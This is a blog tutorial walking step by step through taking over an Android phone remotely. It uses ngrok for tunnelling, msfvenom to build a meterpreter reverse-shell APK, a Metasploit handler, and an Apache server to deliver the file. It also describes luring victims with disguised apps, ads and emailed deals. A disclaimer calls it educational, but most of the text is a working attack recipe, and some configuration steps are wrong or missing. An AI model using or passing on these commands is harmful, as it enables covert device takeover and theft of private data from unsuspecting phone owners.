Hacking Android Over Internet – Any device WAN/LAN

Hacking Android Over Internet

Written by Darshit Varotaria

I'm a Web Application Pentester, Security Researcher and Bug Hunter.

May 5, 2020

In this blog we will practically Hacking Android Over Internet step by step, no matter its on the WAN (internet) or Local network. This blog is mean to be knowledge purpose only and to get aware about the strategies which Blackhat hackers use to hack android devices.

Subscribe on Youtube

Tools used For hacking android over internet:

  1. Ngrok (will work as tunnel to establish connection with our localhost)
  2. Msfvenom (To generate payload)
  3. Metasploit (For reverse shell communication)

Setting up Ngrok:

Now, if you don’t have installed Ngrok on your device, then I will recommend you to first install is from the blog where I have explained it step by step. Make sure you do this because its must! (Read Here – Install Ngrok)

Once you have successfully downloaded and installed Ngrok, go the folder where your Ngrok file is located. In my case, its on Desktop. 

Open terminal there and execute the command given below.

./ngrok tcp 8080

After successful execution, you will get the generated ngrok IP and port which is forwarding all requests to your localhost. This is the reason that we require Ngrok. It is the medium which connects us to victim device which is outside our local network.

Ngrok executed

So, hackers use such tools to get communication from any device.  Keep that terminal open as we will require to copy details further.

Creating payload:

Now, after setting up the communication tunnel we will be creating APK payload. Hackers usually bind backdoor with popular apk apps or create payload and trick victim to download and install it.

To create payload, open new terminal and execute the msfvenom command given below.

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=ngrokIP LPORT=ngrokPORT -o Desktop/dhacker.apk

To get better idea of NgrokIP and NgrokPORT details, have a look at the image given below.

Ngrok IP and PORT details

It will take few secs and you will find the payload on the Kali Linux Desktop.

Setting up communication:

Now, as we have created our payload, the next step is to setup communication where our payload will try to communicate with us, opening a backdoor portal for us to access hacked device.

We will be using Metasploit, for configuration, just follow the steps given below.

The first thing you need to do is to open Metasploit console, Open a new terminal and execute the command given below.

First, start postgresql by command,

sudo service postgresql start

then execute command,

sudo msfconsole

Once the console is ready, we will be using exploit “multi/handler”.

use exploit/multi/handler

Now, we have to set payload which will help us to communicate with our payload.

set payload android/meterpreter/reverse_tcp

hacking android over internet Metasploit with exploit and payload set

Next, we have to configure our payload by giving information like localhost IP and localhost Port. To do that, execute commands given below one by one.

First, execute…

set LHOST localhost

Here, we have used LHOST as our localhost because in the beginning, we have configured ngrok tunnel which will be communicating with our local-host. Now you will have clear picture of ngrok working.

Next, execute…

set LHOST 8080

This is the port we have set in beginning while starting ngrok. After executing above commands, you can check whether the configuration has got saved or not? Command given below.

show options

Finally, if everything is perfect then we will be starting our communication. Simply execute the command given below.


hacking android over internet Metasploit all set and Exploit

Now, we are done on our side, keep the Metasploit running. The only remaining is to share the payload.

Sharing Payload:

Generally, hackers use many tools to protect their IP, making it very difficult to trace them. But this blog is to give a simple idea about how things work. To make their payload get downloaded by victims, they can use public portals or personal hosting, promoting ads for their app for a short period of time. Also, they will be targeting people by mailbox, sending attractive deals leading them to download the app.

For making our practical, realistic, we will be using our apache server to share this payload with device which are part of a local network. So, to start apache server and move our payload, simply follow commands given below.

sudo service apache2 start

Next, we will be moving our payload to server (You can also copy/paste file manually by getting in to the folder. Your Choice!).

sudo mv Desktop/dhacker.apk /var/www/html/

Once it gets moved, check your device IP opening a new terminal.


IP details using ifconfig

Done, you can download payload on your test device by simply opening browser and opening link 192.168.xx.xx/dhacker.apk

After downloading the payload, keep your Metasploit terminal open and install the app on your test device. Once it gets installed, you will see a session is open on your Metasploit terminal. Wait few secs and you will get a meterpreter shell on the terminal.

hacking android over internet Metasploit Session

Now, You can access that android device files. Check it by simple command “sysinfo”.

In this way hackers use to hack our device and can steal our private data. So, NEVER GET APPS FROM UNKNOWN SOURCES!

Note: “hacking android over internet” blog is for educational purpose only, Misuse of this can case criminal charges on you.

You May Also Like…


Submit a Comment

Your email address will not be published.